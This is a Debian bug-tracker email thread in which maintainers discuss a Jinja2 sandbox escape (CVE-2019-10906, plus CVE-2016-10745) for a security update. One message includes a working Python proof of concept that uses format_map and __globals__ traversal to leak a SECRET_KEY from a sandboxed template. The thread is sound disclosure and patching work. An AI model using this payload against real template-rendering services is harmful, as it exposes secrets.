Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Hugo, On Mon, Apr 08, 2019 at 10:20:29PM +0200, Hugo Lefeuvre wrote: > Hi Salvatore, > > > CVE-2016-10745 was assigned for this issue. > > Thanks for the information. > > I just noticed you added CVE-2016-10745 to the tracker. I am fairly > confused, do you know why this CVE was not referenced in the tracker? > Or did you just request it? It was not referenced, because there was not CVE yet. I was irritated that for the later issue apparently a CVE Was assigned, but not for the original first issue, so I requested a CVE for it. It would have showed up on next CVE list update, bug given I got the confirmation from MITRE on the assignment I then already added it to the tracker. So in short, yes I did rquest the CVE and was assigned yesterday. Regards, Salvatore
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Salvatore, > CVE-2016-10745 was assigned for this issue. Thanks for the information. I just noticed you added CVE-2016-10745 to the tracker. I am fairly confused, do you know why this CVE was not referenced in the tracker? Or did you just request it? cheers, Hugo -- Hugo Lefeuvre (hle)|www.owl.eu.com RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C signature.asc Description: PGP signature
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Hugo, On Mon, Apr 08, 2019 at 10:04:35AM +0200, Hugo Lefeuvre wrote: > > This should help confirming vulnerability in other suites. > > 2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and > 2.8-1 are affected by the previous str.format issue[0]. > > [0] https://palletsprojects.com/blog/jinja-281-released/ CVE-2016-10745 was assigned for this issue. Regards, Salvtore
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
> This should help confirming vulnerability in other suites. 2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and 2.8-1 are affected by the previous str.format issue[0]. [0] https://palletsprojects.com/blog/jinja-281-released/ -- Hugo Lefeuvre (hle)|www.owl.eu.com RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C signature.asc Description: PGP signature
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi,
I'm working on a potential jinja2 Debian LTS security update. Here is a
proof of concept which allows to easily reproduce the issue. This should
help confirming vulnerability in other suites.
>>> from jinja2.sandbox import SandboxedEnvironment
>>> env = SandboxedEnvironment()
>>> config = {'SECRET_KEY': '12345'}
>>> class User(object):
... def __init__(self, name):
... self.name = name
...
>>> t = env.from_string('{{
>>> "{x.__class__.__init__.__globals__[config]}".format_map(dic) }}')
>>> t.render(dic={"x": User('joe')})
"{'SECRET_KEY': '12345'}"
Expected behaviour would be jinja2.exceptions.SecurityError.
Adapted from[0].
regards,
Hugo
[0] https://palletsprojects.com/blog/jinja-281-released/
--
Hugo Lefeuvre (hle)|www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C
signature.asc
Description: PGP signature
